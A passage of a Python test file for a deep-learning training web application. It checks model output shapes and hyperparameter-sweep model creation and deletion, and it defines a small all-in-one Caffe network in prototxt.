assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
# make sure the shape of the output matches the shape of the input
data = json.loads(rv.data)
output = np.array(data['outputs']['output'][0])
assert output.shape == (1, self.CROP_SIZE, self.CROP_SIZE), \
'shape mismatch: %s' % str(output.shape)
class TestSweepCreation(BaseViewsTestWithDataset, test_utils.CaffeMixin):
"""
Model creation tests
"""
def test_sweep(self):
job_ids = self.create_model(json=True, learning_rate='[0.01, 0.02]', batch_size='[8, 10]')
for job_id in job_ids:
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
class TestAllInOneNetwork(BaseTestCreation, BaseTestCreated, test_utils.CaffeMixin):
"""
Test an all-in-one network
"""
CAFFE_NETWORK = \
"""
layer {
name: "train_data"
type: "Data"
top: "scaled_data"
transform_param {
scale: 0.004
}
include { phase: TRAIN }
}
layer {
name: "train_label"
type: "Data"
top: "label"
include { phase: TRAIN }
}
layer {
name: "val_data"
type: "Data"
top: "scaled_data"
transform_param {
scale: 0.004
}
include { phase: TEST }
}
layer {
name: "val_label"
type: "Data"
top: "label"
include { phase: TEST }
}
layer {
name: "scale"
type: "Power"
bottom: "data"
top: "scaled_data"
power_param {
scale: 0.004
}
include { stage: "deploy" }
}
layer {
name: "hidden"
type: "InnerProduct"
bottom: "scaled_data"
top: "output"
inner_product_param {
num_output: 2
}
}
layer {
name: "loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
exclude { stage: "deploy" }
}
"""
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.